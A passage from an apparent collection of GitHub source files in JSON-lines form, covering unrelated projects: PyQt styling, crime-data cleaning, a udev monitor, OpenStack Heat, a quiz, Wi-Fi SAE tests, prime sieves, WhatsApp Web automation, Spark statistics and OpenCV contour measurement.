#fff;\r\n }\r\n \"\"\"\r\n table.horizontalHeader().setStyleSheet(header_style)\r\n\r\n cell_style = \"\"\"\r\n QTableWidget::item {\r\n padding: 0px; /* Set the padding */\r\n border-right: 0px dotted transparent;\r\n border-bottom: 1px solid #6D7594;\r\n color: white;\r\n background-color: #323644;\r\n }\r\n\r\n QTableWidget::item:selected {\r\n color: #000;\r\n background-color: #fff; /* Set the background color for the selected tab */\r\n }\r\n \"\"\"\r\n table.setStyleSheet(cell_style)\r\n table.setSelectionBehavior(QTableWidget.SelectRows)\r\n\r\n # Set custom row height for all rows\r\n custom_row_height = 1\r\n for row in range(table.rowCount()):\r\n table.verticalHeader().setDefaultSectionSize(custom_row_height)\r\n","repo_name":"Russo5478/Remote-Monitoring-System","sub_path":"Version3/mainContent/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23023307219","text":"import urllib.request\r\nimport json\r\n\r\ndef cleanCrimeData():\r\n Listy = []\r\n PyStr= urllib.request.urlopen(\"https://data.buffalony.gov/resource/d6g9-xbgu.json\").read().decode().strip()\r\n stri = json.loads(PyStr)\r\n for i in range(0, len(stri)):\r\n if (\"latitude\" and \"longitude\") in stri[i]:\r\n Listy.append([float(stri[i][\"latitude\"]), float(stri[i][\"longitude\"]), stri[i][\"incident_type_primary\"], stri[i][\"hour_of_day\"]])\r\n a = sorted(Listy, key = lambda x:int(x[3]))\r\n return json.dumps(a)\r\n","repo_name":"charlessokolowski/Map-Project","sub_path":"Project 2/Crime_clean.py","file_name":"Crime_clean.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72822558471","text":"\"\"\"Supervisor Hardware monitor based on udev.\"\"\"\nfrom datetime import timedelta\nimport logging\nfrom pprint import pformat\nfrom typing import Optional\n\nimport pyudev\n\nfrom ..coresys import CoreSys, CoreSysAttributes\nfrom ..resolution.const import UnhealthyReason\nfrom ..utils import AsyncCallFilter\n\n_LOGGER: logging.Logger = logging.getLogger(__name__)\n\n\nclass HwMonitor(CoreSysAttributes):\n \"\"\"Hardware monitor for supervisor.\"\"\"\n\n def __init__(self, coresys: CoreSys):\n \"\"\"Initialize Hardware Monitor object.\"\"\"\n self.coresys: CoreSys = coresys\n self.context = pyudev.Context()\n self.monitor: Optional[pyudev.Monitor] = None\n self.observer: Optional[pyudev.MonitorObserver] = None\n\n async def load(self) -> None:\n \"\"\"Start hardware monitor.\"\"\"\n try:\n self.monitor = pyudev.Monitor.from_netlink(self.context)\n self.observer = pyudev.MonitorObserver(self.monitor, self._udev_events)\n except OSError:\n self.sys_resolution.unhealthy = UnhealthyReason.PRIVILEGED\n _LOGGER.critical(\"Not privileged to run udev monitor!\")\n else:\n self.observer.start()\n _LOGGER.info(\"Started Supervisor hardware monitor\")\n\n async def unload(self) -> None:\n \"\"\"Shutdown sessions.\"\"\"\n if self.observer is None:\n return\n\n self.observer.stop()\n _LOGGER.info(\"Stopped Supervisor hardware monitor\")\n\n def _udev_events(self, action: str, device: pyudev.Device):\n \"\"\"Incomming events from udev.\n\n This is inside a observe thread and need pass into our eventloop.\n \"\"\"\n _LOGGER.debug(\"Hardware monitor: %s - %s\", action, pformat(device))\n self.sys_loop.call_soon_threadsafe(self._async_udev_events, action, device)\n\n def _async_udev_events(self, action: str, device: pyudev.Device):\n \"\"\"Incomming events from udev into loop.\"\"\"\n # Sound changes\n if device.subsystem == \"sound\":\n self._action_sound(device)\n\n @AsyncCallFilter(timedelta(seconds=5))\n def _action_sound(self, device: pyudev.Device):\n \"\"\"Process sound actions.\"\"\"\n _LOGGER.info(\"Detecting changed audio hardware\")\n self.sys_loop.call_later(5, self.sys_create_task, self.sys_host.sound.update())\n","repo_name":"OpenPeerPower/supervisor","sub_path":"supervisor/misc/hwmon.py","file_name":"hwmon.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"5069590760","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"SyncPoint object.\"\"\"\n\nfrom oslo_versionedobjects import base\nfrom oslo_versionedobjects import fields\n\nfrom heat.db import api as db_api\nfrom heat.objects import base as heat_base\nfrom heat.objects import fields as heat_fields\n\n\nclass SyncPoint(\n heat_base.HeatObject,\n base.VersionedObjectDictCompat,\n base.ComparableVersionedObject,\n):\n\n fields = {\n 'entity_id': fields.StringField(),\n 'traversal_id': fields.StringField(),\n 'is_update': fields.BooleanField(),\n 'created_at': fields.DateTimeField(read_only=True),\n 'updated_at': fields.DateTimeField(nullable=True),\n 'atomic_key': fields.IntegerField(),\n 'stack_id': fields.StringField(),\n 'input_data': heat_fields.JsonField(nullable=True),\n }\n\n @staticmethod\n def _from_db_object(context, sdata, db_sdata):\n if db_sdata is None:\n return None\n for field in sdata.fields:\n sdata[field] = db_sdata[field]\n sdata._context = context\n sdata.obj_reset_changes()\n return sdata\n\n @classmethod\n def get_by_key(cls,\n context,\n entity_id,\n traversal_id,\n is_update):\n sync_point_db = db_api.sync_point_get(context,\n entity_id,\n traversal_id,\n is_update)\n return cls._from_db_object(context, cls(), sync_point_db)\n\n @classmethod\n def create(cls, context, values):\n sync_point_db = db_api.sync_point_create(context, values)\n return cls._from_db_object(context, cls(), sync_point_db)\n\n @classmethod\n def update_input_data(cls,\n context,\n entity_id,\n traversal_id,\n is_update,\n atomic_key,\n input_data):\n return db_api.sync_point_update_input_data(\n context,\n entity_id,\n traversal_id,\n is_update,\n atomic_key,\n input_data)\n\n @classmethod\n def delete_all_by_stack_and_traversal(cls,\n context,\n stack_id,\n traversal_id):\n return db_api.sync_point_delete_all_by_stack_and_traversal(\n context,\n stack_id,\n traversal_id)\n","repo_name":"openstack/heat","sub_path":"heat/objects/sync_point.py","file_name":"sync_point.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","stars":385,"dataset":"github-code","pt":"27"} +{"seq_id":"27294228182","text":"\r\n# Question\r\n\r\nimport random\r\n\r\nclass Questions:\r\n def __init__(self, question, choice,answer, subject):\r\n self.question = question\r\n self.choice = choice\r\n self.answer = answer\r\n self.subject = subject\r\n\r\n def showQuestion(self):\r\n print('******************************************************')\r\n print(\"Soru:\", self.question)\r\n print(\"Seçenekler:\")\r\n for secenek, cevap in self.choice:\r\n print(secenek + \":\", cevap) \r\n\r\n def checkAnswer(self, selectAnswer):\r\n return selectAnswer == self.answer \r\n \r\n\r\n \r\nsoru_seti = {\r\n\r\n \"Soru 1\": {\r\n \"soru_metni\": \"8 * 4 kaçtir?\",\r\n \"secenekler\": {\r\n \"A\": \"24\",\r\n \"B\": \"32\",\r\n \"C\": \"36\",\r\n \"D\": \"40\"\r\n },\r\n \"dogru_cevap\": \"B\",\r\n \"konu\":\"Matematik\"\r\n },\r\n \"Soru 2\": {\r\n \"soru_metni\": \"Karekökü 25 olan sayi hangisidir?\",\r\n \"secenekler\": {\r\n \"A\": \"3\",\r\n \"B\": \"5\",\r\n \"C\": \"7\",\r\n \"D\": \"9\"\r\n },\r\n \"dogru_cevap\": \"B\",\r\n \"konu\":\"Matematik\"\r\n },\r\n \"Soru 3\": {\r\n \"soru_metni\": \"Türkiye'nin başkenti hangi şehirdir?\",\r\n \"secenekler\": {\r\n \"A\": \"İstanbul\",\r\n \"B\": \"Ankara\",\r\n \"C\": \"İzmir\",\r\n \"D\": \"Antalya\"\r\n },\r\n \"dogru_cevap\": \"B\",\r\n \"konu\":\"Coğrafya\"\r\n },\r\n \"Soru 4\": {\r\n \"soru_metni\": \"Dünyanin en yüksek daği hangisidir?\",\r\n \"secenekler\": {\r\n \"A\": \"Mont Blanc\",\r\n \"B\": \"Everest\",\r\n \"C\": \"Kilimanjaro\",\r\n \"D\": \"K2\"\r\n },\r\n \"dogru_cevap\": \"B\",\r\n \"konu\":\"Coğrafya\"\r\n },\r\n \"Soru 5\": {\r\n \"soru_metni\": \"Osmanli İmparatorluğu'nun son dönem padişahi kimdir?\",\r\n \"secenekler\": {\r\n \"A\": \"II. Mahmud\",\r\n \"B\": \"III. Mustafa\",\r\n \"C\": \"II. Abdülhamid\",\r\n \"D\": \"V. Mehmed Reşad\"\r\n },\r\n \"dogru_cevap\": \"D\",\r\n \"konu\":\"Tarih\"\r\n },\r\n \"Soru 6\": {\r\n \"soru_metni\": \"I. Dünya Savaşi'nin başlangiç tarihi nedir?\",\r\n \"secenekler\": {\r\n \"A\": \"1912\",\r\n \"B\": \"1914\",\r\n \"C\": \"1916\",\r\n \"D\": \"1918\"\r\n },\r\n \"dogru_cevap\": \"B\",\r\n \"konu\":\"Tarih\"\r\n },\r\n \"Soru 7\": {\r\n \"soru_metni\": \"Hangisi William Shakespeare'in oyunlarndan biridir?\",\r\n \"secenekler\": {\r\n \"A\": \"Hamlet\",\r\n \"B\": \"Don Kişot\",\r\n \"C\": \"Suç ve Ceza\",\r\n \"D\": \"Sefiller\"\r\n },\r\n \"dogru_cevap\": \"A\",\r\n \"konu\":\"Edebiyat\"\r\n },\r\n \"Soru 8\": {\r\n \"soru_metni\": \"Türk edebiyatinda 'Halit Ziya Uşakligil' hangi dönemin yazaridir?\",\r\n \"secenekler\": {\r\n \"A\": \"Tanzimat Dönemi\",\r\n \"B\": \"Servet-i Fünun Dönemi\",\r\n \"C\": \"Milli Edebiyat Dönemi\",\r\n \"D\": \"Cumhuriyet Dönemi\"\r\n },\r\n \"dogru_cevap\": \"A\",\r\n \"konu\":\"Edebiyat\"\r\n }\r\n}\r\n\r\n\r\ndef processMain():\r\n for soruSec in range(4):\r\n # Rastgele soru seçer\r\n soruSec = random.choice(list(soru_seti.keys()))\r\n\r\n question = soru_seti[soruSec]['soru_metni']\r\n choices = soru_seti[soruSec]['secenekler'].items()\r\n answer = soru_seti[soruSec]['dogru_cevap']\r\n subject = soru_seti[soruSec]['konu']\r\n\r\n q1 = Questions(question,choices,answer,subject)\r\n q1.showQuestion()\r\n del soru_seti[soruSec]\r\n answerQuestion(q1)\r\n\r\n \r\ndef answerQuestion(question):\r\n selectAnswer = str(input(\"Cevap şikkini giriniz : \"))\r\n if question.checkAnswer(selectAnswer):\r\n print('Tebrikler. cevabi bildiniz')\r\n else:\r\n print(f'Maalesef, yanliş cevap.. DOĞRU CEVAP {question.answer}') \r\n\r\n\r\n\r\nprocessMain()\r\n\r\n\r\n\r\n","repo_name":"TriTetra/python_ogrendiklerim","sub_path":"Demos/6.OOP/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":4247,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"72361110792","text":"#!/usr/bin/python3\n\nimport unittest\nimport sys\n\nsys.path.append('../util')\nimport iwd\nfrom iwd import IWD\nfrom iwd import PSKAgent\nfrom iwd import NetworkType\nfrom hostapd import HostapdCLI\nimport testutil\n\nclass Test(unittest.TestCase):\n\n def validate_connection(self, wd):\n psk_agent = PSKAgent(\"secret123\")\n wd.register_psk_agent(psk_agent)\n\n devices = wd.list_devices(1)\n self.assertIsNotNone(devices)\n device = devices[0]\n\n device.disconnect()\n\n network = device.get_ordered_network('ssidSAE', full_scan=True)\n\n self.assertEqual(network.type, NetworkType.psk)\n\n network.network_object.connect()\n\n condition = 'obj.state == DeviceState.connected'\n wd.wait_for_object_condition(device, condition)\n\n wd.wait(2)\n\n testutil.test_iface_operstate(intf=device.name)\n testutil.test_ifaces_connected(if0=device.name, if1=self.hostapd.ifname)\n\n device.disconnect()\n\n condition = 'not obj.connected'\n wd.wait_for_object_condition(network.network_object, condition)\n\n wd.unregister_psk_agent(psk_agent)\n\n def test_SAE(self):\n self.hostapd.set_value('sae_pwe', '0')\n self.hostapd.set_value('sae_groups', '19')\n self.hostapd.set_value('vendor_elements', '')\n self.hostapd.reload()\n self.hostapd.wait_for_event(\"AP-ENABLED\")\n self.validate_connection(self.wd)\n\n def test_SAE_force_group_19(self):\n self.hostapd.set_value('sae_pwe', '0')\n self.hostapd.set_value('sae_groups', '19')\n # Vendor data from APs which require group 19 be used first\n # TODO: (for all tests) verify the expected group was used\n self.hostapd.set_value('vendor_elements', 'dd0cf4f5e8050500000000000000')\n self.hostapd.reload()\n self.hostapd.wait_for_event(\"AP-ENABLED\")\n self.validate_connection(self.wd)\n\n def test_SAE_Group20(self):\n self.hostapd.set_value('sae_pwe', '0')\n self.hostapd.set_value('sae_groups', '20')\n self.hostapd.set_value('vendor_elements', '')\n self.hostapd.reload()\n self.hostapd.wait_for_event(\"AP-ENABLED\")\n self.validate_connection(self.wd)\n\n def test_SAE_H2E(self):\n self.hostapd.set_value('sae_pwe', '1')\n self.hostapd.set_value('sae_groups', '19')\n self.hostapd.set_value('vendor_elements', '')\n self.hostapd.reload()\n self.hostapd.wait_for_event(\"AP-ENABLED\")\n self.validate_connection(self.wd)\n\n def test_SAE_H2E_Group20(self):\n self.hostapd.set_value('sae_pwe', '1')\n self.hostapd.set_value('sae_groups', '20')\n self.hostapd.set_value('vendor_elements', '')\n self.hostapd.reload()\n self.hostapd.wait_for_event(\"AP-ENABLED\")\n self.validate_connection(self.wd)\n\n def setUp(self):\n self.wd = IWD(True)\n\n def tearDown(self):\n self.wd.clear_storage()\n self.wd = None\n\n @classmethod\n def setUpClass(cls):\n cls.hostapd = HostapdCLI(config='ssidSAE.conf')\n\n @classmethod\n def tearDownClass(cls):\n pass\n\nif __name__ == '__main__':\n unittest.main(exit=True)\n","repo_name":"illiliti/eiwd","sub_path":"autotests/testSAE/connection_test.py","file_name":"connection_test.py","file_ext":"py","file_size_in_byte":3166,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"27"} +{"seq_id":"30364892780","text":"#!/usr/bin/env python3\n\"\"\"Sieve of Eratosthenes.\"\"\"\n\nimport logging\nimport threading\nimport typing\n\nfrom collections.abc import Sequence\n\ndef sieve(n: int) -> list[int]:\n \"\"\"\"Returns the list of prime numbers up to and including N.\"\"\"\n if n < 2:\n return []\n size = n + 1\n is_prime = [True] * size # One slot for each int up to n.\n is_prime[0:2] = (False, False) # 0 and 1 are not primes.\n for p in range(size):\n if is_prime[p]:\n for v in range(p * p, size, p if p < 3 else 2 * p):\n is_prime[v] = False\n return [p for p in range(size) if is_prime[p]]\n\ndef is_prime(n: int) -> bool:\n \"\"\"Checks if a positive integer N is a prime number by brute force.\"\"\"\n return n > 1 and all(n % d != 0 for d in range(2, n // 2 + 1))\n\ndef bsearch(n: int, ary: Sequence[int]) -> typing.Optional[int]:\n \"\"\"Finds the array index of the highest of ARY equal to or less than N, or None\"\"\"\n if not ary or n < ary[0]:\n return None\n if n >= ary[-1]:\n return len(ary) - 1\n lo = 0\n hi = len(ary)\n while hi - lo > 1:\n mid = (hi + lo + 1) // 2\n v = ary[mid]\n if n == v:\n return mid\n elif n > v:\n lo = mid\n else: # n < v\n hi = mid\n return lo\n\n_primes: list[int] = [] # Cache of previously calculated primes\n_primes_lock = threading.Lock() # Concurrency lock for _primes\n\ndef isieve(n: int) -> list[int]:\n \"\"\"Incremental sieve.\"\"\"\n global _primes\n global _primes_lock\n if n < 2:\n return []\n with _primes_lock:\n last_idx = len(_primes) - 1\n hi_idx = bsearch(n, _primes)\n if hi_idx is None: # hi_idx == 0 is a valid found prime\n # Use the non-incremental algorithm.\n _primes = sieve(n)\n return _primes[:]\n elif hi_idx < last_idx:\n # n is in the middle; return copy slice of _primes\n return _primes[:hi_idx + 1]\n elif hi_idx == last_idx:\n # extend primes if necessary, then return a copy\n extension = additional(n, _primes)\n _primes.extend(extension)\n return _primes[:]\n else:\n raise IndexError(f'invalid index: {hi_idx} vs {last_idx}')\n\ndef additional(n: int, previous_primes: Sequence[int]) -> list[int]:\n vbase = previous_primes[-1] if previous_primes else 1\n if n < 2 or n == vbase:\n return []\n # Create an scratch array for numbers between the previous_primes and n.\n is_prime = [True] * (n - vbase) # does not include vbase\n def i2v(i: int) -> int:\n \"\"\"Maps an is_prime array index to the integer value it represents.\"\"\"\n return vbase + i + 1\n def v2i(v: int) -> int:\n \"\"\"Maps a value to an is_prime index.\"\"\"\n return v - vbase - 1\n # Mark array with multiples of previous primes\n if previous_primes:\n for i in range(len(is_prime)):\n value_to_check = i2v(i)\n for p in previous_primes:\n if value_to_check % p == 0:\n is_prime[i] = False\n break\n # Identify new primes to be returned.\n new_primes = []\n # Mark is_prime for newly discovered primes\n for i in range(len(is_prime)):\n p = i2v(i)\n if is_prime[i]:\n new_primes.append(p)\n for v in range(p * p, n + 1, p if p == 2 else 2 * p):\n k = v2i(v)\n is_prime[k] = False\n return new_primes\n\ndef generate(lo: int, hi: int) -> typing.Generator[int, None, None]:\n \"\"\"Generates prime numbers between LO and HI inclusive.\"\"\"\n primes = []\n candidate = 2\n increment = 1\n while candidate <= hi:\n # Implementation below is faster than using\n # is_prime = all(candidate % p != 0 for p in primes)\n # possibly because of generator creation with all().\n is_prime = True\n for p in primes:\n if candidate % p == 0:\n is_prime = False\n break\n if is_prime:\n primes.append(candidate)\n if candidate >= lo:\n yield candidate\n candidate += increment\n increment = 2\n","repo_name":"ghst659/primes","sub_path":"primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8849597590","text":"from selenium import webdriver\nfrom selenium.webdriver.common.alert import Alert\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException, \\\n UnexpectedAlertPresentException, NoAlertPresentException\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom time import sleep\nfrom urllib.parse import quote\nfrom sys import platform\n\nimport time\nfrom year import year\nfrom Phone_Numbers import numbers\n\ndef text_required():\n month = time.localtime().tm_mon - 1\n day = time.localtime().tm_mday - 1\n\n today_text = f'Today\\'s Bible Portion : {year[month][day]}'\n return today_text\n\n\noptions = Options()\nif platform == \"win32\":\n options.binary_location = r\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"\n\nmessage = \"Ignore Me\" # text_required()\nmessage = quote(message)\n\n\ntotal_number = len(numbers)\ndelay = 30\n\ndriver = webdriver.Chrome(ChromeDriverManager().install())\ndriver.get('https://web.whatsapp.com')\n\ninput(\"Press ENTER after login into Whatsapp Web and your chats are visible\t.\")\n\nfor idx, number in enumerate(numbers):\n number = number.strip()\n\n if number == \"\":\n continue\n\n print('{}/{} => Sending message to {}.'.format((idx + 1), total_number, number))\n\n try:\n url = 'https://web.whatsapp.com/send?phone=' + number + '&text=' + message\n sent = False\n\n for i in range(3):\n\n if not sent:\n driver.get(url)\n\n try:\n click_btn = WebDriverWait(driver, delay).until(\n EC.element_to_be_clickable((By.CLASS_NAME, '_4sWnG')))\n except Exception as e:\n print(f\"Something went wrong..\\n Failed to send message to: {number}, retry ({i + 1}/3)\")\n print(\"Make sure your phone and computer is connected to the internet.\")\n print(\"If there is an alert, please dismiss it.\")\n input(\"Press enter to continue\")\n\n else:\n sleep(1)\n click_btn.click()\n sent = True\n sleep(3)\n print('Message sent to: ' + number)\n\n except Exception as e:\n print('Failed to send message to ' + number + str(e))","repo_name":"Grace-Hephzibah/Automate_Daily_Scripture_Portion","sub_path":"Automation.py","file_name":"Automation.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"32143095669","text":"from typing import List\nfrom math import inf\n\nclass Solution:\n def matchCount(self, word1, word2):\n return len([i for i in range(len(word1)) if word1[i] == word2[i]])\n \n \n def expectationOfElemination(self, words, target):\n chanceOfMatchCnt = [0,0,0,0,0,0,0]\n for word in words:\n matchCnt = self.matchCount(word, target)\n chanceOfMatchCnt[matchCnt] += 1\n \n chanceOfMatchCnt = [n/len(words) for n in chanceOfMatchCnt]\n expectation = 0\n for matchCnt in range(6):\n eliminateCnt = 0\n for word in words:\n if self.matchCount(word, target) != matchCnt:\n eliminateCnt += 1\n \n expectation += chanceOfMatchCnt[matchCnt] * eliminateCnt\n \n return expectation\n\n def findSecretWord(self, wordlist: List[str], master: 'Master') -> None:\n candidates = wordlist\n for i in range(10):\n maxExpectation = -inf\n bestChoice = \"\"\n for word in candidates:\n zeroCnt = 0\n expectation = self.expectationOfElemination(candidates, word)\n if expectation > maxExpectation:\n maxExpectation = expectation\n bestChoice = word\n \n matchCnt = master.guess(bestChoice)\n if matchCnt == 6:\n break\n \n newCandidates = []\n for word in candidates:\n if self.matchCount(bestChoice, word) == matchCnt:\n newCandidates.append(word)\n candidates = newCandidates","repo_name":"DingChiLin/AlgorithmSampleCode","sub_path":"Math/GuessTheWord.py","file_name":"GuessTheWord.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"4911604369","text":"# -*- coding: utf-8 -*-\n\nfrom calendar import monthrange\nfrom ConfigParser import RawConfigParser\nfrom pyspark import SparkConf\nfrom pyspark.sql import functions as F\nfrom pyspark.sql import Row, SparkSession\n\nimport argparse\n\ndef retrieveScannedInfo(spark, fr, to):\n\tsql = \"\"\"\n\t\tselect\n\t\t\timei,\n\t\t\tdata_date\n\t\tfrom\n\t\t\tronghui_mart.rh_stat_app_install_all\n\t\twhere\n\t\t\tdata_date between '{0}' and '{1}'\n\t\"\"\".format(fr, to)\n\tprint(sql)\n\tscanned_devices = spark.sql(sql)\n\treturn scanned_devices\n\ndef retrieveActionCounts(spark, to):\n\tsql = \"\"\"\n\t\tselect\n\t\t\timei,\n\t\t\tcnt_app_30d_new,\n\t\t\tcnt_app_30d_delete\n\t\tfrom\n\t\t\tronghui_mart.rh_stat_app_install_30d_all\n\t\twhere\n\t\t\tdata_date = '{0}'\n\t\"\"\".format(to)\n\tprint(sql)\n\taction_counts = spark.sql(sql)\n\treturn action_counts\n\ndef transform_to_row(row_dict):\n\tglobal args\n\trow_dict['data_date'] = args.query_month\n\treturn Row(**row_dict)\n\nif __name__ == '__main__':\n\tprint('====> Initializing Spark APP')\n\tlocalConf = RawConfigParser()\n\tlocalConf.read('../config')\n\tsparkConf = SparkConf()\n\tfor t in localConf.items('spark-config'):\n\t\tsparkConf.set(t[0], t[1])\n\tspark = SparkSession.builder \\\n\t\t\t.appName('RLab_Stats_Report___Cal_Installment_Stats_of_Devices') \\\n\t\t\t.config(conf=sparkConf) \\\n\t\t\t.enableHiveSupport() \\\n\t\t\t.getOrCreate()\n\tsc = spark.sparkContext\n\n\tprint('====> Parsing local arguments')\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--query_month', type=str)\n\targs = parser.parse_args()\n\tfr = args.query_month+'01'\n\tto = args.query_month+str(monthrange(int(args.query_month[:4]), int(args.query_month[4:]))[1])\n\n\tprint('====> Start calculation')\n\tresult = {}\n\t\n\tscanned_devices = retrieveScannedInfo(spark, fr, to)\n\tscanned_devices_stats = scanned_devices.groupBy(['data_date']).agg(F.count(F.lit(1)).alias('daily_device_count'))\n\tscanned_devices_stats = scanned_devices_stats.select(F.mean('daily_device_count').alias('avg_daily_device_count')).collect()\n\tresult['avg_daily_device_count'] = scanned_devices_stats[0]['avg_daily_device_count']\n\n\taction_counts = retrieveActionCounts(spark, to)\n\taction_count_stats = action_counts.select(\\\n\t\tF.mean('cnt_app_30d_new').alias('avg_installed_app_per_device_30'),\\\n\t\tF.mean('cnt_app_30d_new').alias('avg_uninstalled_app_per_device_30')).collect()\n\tresult['avg_installed_app_per_device_30'] = action_count_stats[0]['avg_installed_app_per_device_30']\n\tresult['avg_uninstalled_app_per_device_30'] = action_count_stats[0]['avg_uninstalled_app_per_device_30']\n\n\tresult = sc.parallelize([result]).map(transform_to_row).toDF()\n\tresult.repartition(1).write.csv('/user/ronghui_safe/hgy/rlab_stats_report/installment/device/{0}'.format(args.query_month), header=True)\n","repo_name":"SweeRoty/fintell_app","sub_path":"stats/cal_device_installment_stats_rh.py","file_name":"cal_device_installment_stats_rh.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21737099857","text":"#!/usr/bin/python3.5\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.misc import imshow, imread, imsave\nimport os\nimport sys\nimport optparse\n\ndef edges(image, save, dest_dir, name):\n\n #Canny filter returns binary image with object perimeter in black\n edges = cv2.Canny(image, 9000, 12000, apertureSize = 5)\n\n #Initializes output image with zeros\n edges_rgb = np.zeros(shape=(edges.shape[0], edges.shape[1], 3))\n\n #Makes object perimeter red and remaining image white.\n for i in range(edges.shape[0]):\n for j in range(edges.shape[1]):\n if edges[i][j] == 0:\n edges_rgb[i][j][:] = [255, 255, 255]\n else:\n edges_rgb[i][j][0] = 255\n\n\n if save:\n imsave(os.path.join(dest_dir, name+\"_edge.png\"), edges_rgb)\n else:\n imshow(edges_rgb)\n\n return edges\n\ndef obj_properties(image, save, dest_dir, name):\n area_list = []\n height = image.shape[0]\n width = image.shape[1]\n\n #If user chooses to pass another three channel image, cvtColor will distort it.\n #Verifies image is either RGB or monocromatic\n if image.shape.__len__() == 3 and image.shape[2] == 3:\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n elif image.shape.__len__() == 2:\n gray = image\n else:\n print(\"Image colorspace has to be either RGB or monocromatic\")\n exit(1)\n\n #Threshold image to binary values then find contours.\n #Canny image makes opencv find two contours for each object.\n thresh, bin_img = cv2.threshold(gray, thresh=250, maxval=255, type=cv2.THRESH_BINARY)\n _, contours, _ = cv2.findContours(bin_img, 1, 2)\n\n\n #Define text properties\n font = cv2.FONT_HERSHEY_COMPLEX\n font_color = (0,0,0)\n thickness = 1\n font_scale = 0\n bottomLeftCornerOfText = (0, 0)\n\n #Ignore any boundary contours. Here we consider no object lies in the boundary of image frame.\n contour_final = []\n for i, cnt in enumerate(contours):\n rect = cv2.boundingRect(cnt)\n if rect[0] > 0 and rect[1] > 0 and rect[1] < width and rect[3] < height:\n contour_final.append(cnt)\n\n #Process output image\n out_img = np.zeros((height, width, 3), dtype=np.uint8)\n for i in range(height):\n for j in range(width):\n if bin_img[i][j] == 0:\n out_img[i][j][:] = [255, 50, 50]\n else:\n out_img[i][j][:] = [255, 255, 255]\n\n\n #Iterate over every contour printing it's region number, perimeter and area.\n print(\"número de regiões: {}\".format(contour_final.__len__()))\n for i, cnt in enumerate(contour_final):\n\n #Find centroid of contour\n M = cv2.moments(cnt)\n cx = M['m10']/M['m00']\n cy = M['m01']/M['m00']\n\n area = cv2.contourArea(cnt)\n perimeter = cv2.arcLength(cnt, closed=True)\n area_list.append(int(area))\n\n #Change fontscale according to contour area\n if area >= 1500: font_scale = 0.7\n else: font_scale = 0.4\n\n text_size, _ = cv2.getTextSize(str(i), font, font_scale, thickness)\n\n tx = text_size[0]/2\n ty = text_size[1]/2\n\n bottomLeftCornerOfText = (int(cx-tx), int(cy+ty))\n\n #Write region number in the center of contour\n cv2.putText(out_img, str(i), bottomLeftCornerOfText, font, font_scale, font_color, thickness)\n\n print(\"região:{:>3} perímetro:{:>4} área:{:>5}\".format(i, int(perimeter), int(area)))\n\n if save:\n imsave(os.path.join(dest_dir, name+\"_objp.png\"), out_img)\n else:\n imshow(out_img)\n\n return out_img, area_list\n\ndef histogram(area_list, save, dest_dir, name):\n\n #Defines bins according to specified intervals:\n # small = [0, 1500)\n # medium = [1500, 3000)\n # maximum = [3000, area_list.max()]\n max_area = np.max(area_list)\n if max_area < 1500:\n bins = [0, 1500]\n elif max_area < 3000:\n bins = [0, 1500, 3000]\n else:\n bins = [0, 1500, 3000, max_area]\n\n #Plots histogram\n plt.hist(area_list, bins=bins, color=\"r\", rwidth=0.5)\n print(bins)\n print(np.diff(bins))\n print(bins[:-1])\n plt.xlabel(\"Área\")\n plt.ylabel(\"Número de Objetos\")\n plt.title(\"Histograma de Área dos Objetos\")\n\n if save:\n plt.savefig(os.path.join(dest_dir, name+\"_hist\"))\n else:\n plt.show()\n plt.close()\n\n return\n\ndef main(filenames, save=False, dest_dir=\"out\"):\n\n for fn in filenames:\n if not os.path.isfile(fn):\n print(\"Image {} doesn't exist.\".format(fn))\n exit(1)\n if fn.split('.')[-1] != \"png\":\n print(\"Invalid image file: {}. Image must be in PNG format.\".format(fn))\n exit(1)\n #Creates directory to save image files\n if save:\n if not os.path.isdir(dest_dir):\n os.mkdir(dest_dir)\n\n for fn in filenames:\n name = fn.split('/')[-1].split('.')[-2]\n img = imread(fn)\n edges(img, save, dest_dir, name)\n _, area_list = obj_properties(img, save, dest_dir, name)\n histogram(area_list, save, dest_dir, name)\n\n\n\n\nif __name__ == \"__main__\":\n parser = optparse.OptionParser()\n parser.add_option(\"-s\", \"--save\",\n action=\"store_true\", dest=\"save\",\n help=\"Save all generated images into DEST_DIR directory. By default this is ./out\")\n\n parser.add_option(\"-d\", \"--dest_dir\",\n action=\"store\", type=\"string\", dest=\"dest_dir\",\n help=\"Directory to place image files. If save is False, this option is ignored.\",\n 